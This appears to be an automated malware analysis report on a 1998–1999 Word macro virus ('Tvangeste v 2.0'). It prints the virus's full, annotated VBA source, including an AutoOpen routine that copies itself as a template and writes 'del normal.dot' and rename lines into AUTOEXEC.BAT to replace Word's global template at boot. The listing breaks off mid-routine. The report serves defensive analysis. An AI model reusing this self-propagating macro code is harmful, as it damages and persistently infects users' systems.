Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3b0514b28cd449d1…

MALICIOUS

Office (OLE)

36.0 KB Created: 1980-01-11 05:39:00 (implausible for a Word 8.0 / Word 97 file — treat the creation timestamp as zeroed or forged rather than as evidence of age; the macro text itself references 1998–1999) Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6939ecf2e5b098f8dc074ae6bc4c104d SHA-1: 10f0371eecb0d43811c3cac69c92a9bde7d9d551 SHA-256: 3b0514b28cd449d1ae5ea53b4b4841eeacae70af9baf29999e2b353e55c6321f
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA module ('NewMacros') with an AutoOpen subroutine, so the macro runs automatically when the document is opened in Word with macros enabled. AutoOpen first saves the open document itself (the file carrying this macro) as a Word template named 'kafeln.dot' in the Russian-localized Office templates directory ('C:\Program Files\Microsoft Office\Шаблоны\' — 'Шаблоны' means 'Templates'). It then opens C:\AUTOEXEC.BAT in Word as a document and appends three lines to it: a 'cd' into the templates directory, 'del normal.dot', and 'ren kafeln.dot normal.dot'. Nothing is executed at macro time — on a DOS/Windows 9x host these lines run at the next boot, at which point the infected template replaces the global template normal.dot and the macro is loaded into every subsequent Word session. The chained ATPtour routine appends further lines that create a 'c:\atp_tour' directory tree named after tennis players and map it to drive K: with 'subst'; the remaining routines (ATP, tour, Info) only display message boxes (Russian text celebrating Kafelnikov reaching ATP No. 1 on 3 May 1999; the dialog title 'Tvangeste v 2.0' is the sample's self-identification). No download, network, or registry activity is present in the recovered code, so the T1547.001 (Registry Run Keys / Startup Folder) tag is a loose fit: the persistence mechanisms here are global-template replacement and a boot-time batch file edited through Word's own save path. This is consistent with a Word 97-era macro virus rather than a modern downloader.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this marker's wording ("no modern VBA project was recovered") conflicts with the artifact listed under Extracted artifacts, where olevba did recover a 4,377-byte VBA project (modules ThisDocument and NewMacros); treat the two VBA findings above as authoritative.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4377 bytes
SHA-256: fb36076ccff7cd90a402e3938d078ddc947f9e41b07675d8368773bb3184c7e2
Preview script
First 1,000 lines of the extracted script
' ANALYST NOTE: olevba concatenates the document's VBA modules into one
' listing; the two "Attribute VB_Name" headers below mark two modules:
' ThisDocument (the document class module — no procedures of its own appear
' in the listing) and NewMacros, which holds every procedure that follows.
' Code is reproduced byte-for-byte from the carved artifact; only comments
' were added.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Second module: all subroutines below (AutoOpen, ATPtour, ATP, tour, Info)
' live here.
Attribute VB_Name = "NewMacros"
' ANALYST NOTE: auto-executing entry point — Word runs AutoOpen when the
' document is opened with macros enabled. Code is the carved sample,
' reproduced byte-for-byte; only these comments were added.
Sub AutoOpen()
    ' Step 1: save the open document (the file carrying this macro) as a Word
    ' template named kafeln.dot. "Шаблоны" is Russian for "Templates", i.e.
    ' the templates directory of a Russian-localized Office install.
    ActiveDocument.SaveAs FileName:= _
        "C:\Program Files\Microsoft Office\Шаблоны\kafeln.dot", FileFormat:= _
        wdFormatTemplate, LockComments:=False, Password:="", AddToRecentFiles:= _
        True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
        False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
        SaveAsAOCELetter:=False
    ' Step 2: open C:\AUTOEXEC.BAT *as a Word document* (ConfirmConversions
    ' suppresses the conversion prompt). Nothing is executed here; the batch
    ' file is only edited.
    ChangeFileOpenDirectory "C:\"
    Documents.Open FileName:="AUTOEXEC.BAT", ConfirmConversions:=False, _
        ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto
    ' Step 3: append three lines at the end of the batch file — change into
    ' the templates directory, delete the global template normal.dot, rename
    ' kafeln.dot to normal.dot. On a DOS/Windows 9x host AUTOEXEC.BAT runs at
    ' the next boot, so the infected template becomes the global template
    ' then. This is the persistence mechanism: template replacement via a
    ' boot-time script, not a registry Run key.
    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.TypeText Text:="cd C:\Program Files\Microsoft Office\Шаблоны\"
    Selection.TypeParagraph
    Selection.TypeText Text:="del normal.dot"
    Selection.TypeParagraph
    Selection.TypeText Text:="ren kafeln.dot normal.dot"
    ' Write the edited batch file back and close it. NOTE(review): whether
    ' Word writes it back as plain text (runnable) or in Word format (not
    ' runnable) depends on the format it was opened as; not verifiable from
    ' this static listing.
    ActiveDocument.Save
    ActiveDocument.Close
    ' Step 4: chain into ATPtour (defined below), which edits AUTOEXEC.BAT
    ' a second time.
    Application.Run MacroName:="ATPtour"
End Sub
' ANALYST NOTE: second stage, invoked by AutoOpen via Application.Run.
' Re-opens C:\AUTOEXEC.BAT in Word and appends more lines; again nothing is
' executed at macro time. The appended payload is a directory tree of tennis
' player names plus a drive mapping — a marker/"joke" payload, not a
' downloader. Code reproduced byte-for-byte; only comments were added.
Sub ATPtour()
    ChangeFileOpenDirectory "C:\"
    Documents.Open FileName:="AUTOEXEC.BAT", ConfirmConversions:=False, _
        ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto
    ' Move to the end of the batch file and append the lines below.
    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    ' Batch lines: create c:\atp_tour and ten numbered sub-folders (note the
    ' numbering 001..010 is written out of order — krajicek.005 comes last).
    Selection.TypeText Text:="md c:\atp_tour"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\kafelnik.001"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\sampras.002"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\corretja.003"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\rafter.004"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\moya.006"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\henman.007"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\rios.008"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\philipou.009"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\kucera.010"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\krajicek.005"
    Selection.TypeParagraph
    ' Final batch line: map c:\atp_tour to drive letter K: (output silenced).
    Selection.TypeText Text:="subst k: c:\atp_tour >nul"
    Selection.TypeParagraph
    ' Write the edited batch file back and close it.
    ActiveDocument.Save
    ActiveDocument.Close
    ' Chain into ATP (defined below): message-box only, no further file
    ' system activity.
    Application.Run MacroName:="ATP"
End Sub
' ANALYST NOTE: third stage — shows a message box, then chains into "tour".
' No file-system, network or persistence activity in this routine. Code
' reproduced byte-for-byte; only comments were added.
Sub ATP()
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
' Russian: "On 3 May 1999 Kafelnikov is number 1!!!!!!!!"
Msg = "3 мая 1999 года Кафельников - номер 1!!!!!!!!"
' NOTE(review): vbYesOk is not a built-in MsgBox constant (vbYesNo is). If it
' is an undeclared Variant — no Option Explicit is visible in this listing —
' it evaluates to Empty, so Style = vbCritical + vbDefaultButton2 and the box
' shows only an OK button; the vbYes branch below would then never be taken.
Style = vbYesOk + vbCritical + vbDefaultButton2
Title = "ATPtour"
' Help file and context id passed to MsgBox; DEMO.HLP is not among the
' extracted artifacts.
Help = "DEMO.HLP"
Ctxt = 1000
Response = MsgBox(Msg, Style, Title, Help, Ctxt)
' MyString ("Да" = "Yes", "Нет" = "No") is assigned but never read.
If Response = vbYes Then
    MyString = "Да"
Else
    MyString = "Нет"
End If
    ' Chain into tour (defined below), a near-duplicate of this routine.
    Application.Run MacroName:="tour"
End Sub
' ANALYST NOTE: fourth stage — identical to ATP except that it chains into
' "Info" instead of "tour". Message box only; no file-system, network or
' persistence activity. Code reproduced byte-for-byte; only comments added.
Sub tour()
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
' Russian: "On 3 May 1999 Kafelnikov is number 1!!!!!!!!"
Msg = "3 мая 1999 года Кафельников - номер 1!!!!!!!!"
' NOTE(review): as in ATP, vbYesOk is not a built-in constant; if undeclared
' it is Empty, the dialog shows only OK, and the vbYes branch is unreachable.
Style = vbYesOk + vbCritical + vbDefaultButton2
Title = "ATPtour"
Help = "DEMO.HLP"
Ctxt = 1000
Response = MsgBox(Msg, Style, Title, Help, Ctxt)
' MyString ("Да" = "Yes", "Нет" = "No") is assigned but never read.
If Response = vbYes Then
    MyString = "Да"
Else
    MyString = "Нет"
End If
    ' Chain into Info (defined below; its body is truncated in this listing).
    Application.Run MacroName:="Info"
End Sub
Sub Info()
Attribute Info.VB_Description = "Макрос записан 07.04.98 Tvangeste"
Attribute Info.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.Info"
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
Msg = "Kafelnikov"
Style = vbYesOk + vbCritical + vbDefaultButton2
Title = "Tvangeste v 2.0"
Help = "DEMO.HLP"
Ctxt = 1000
R
... (truncated)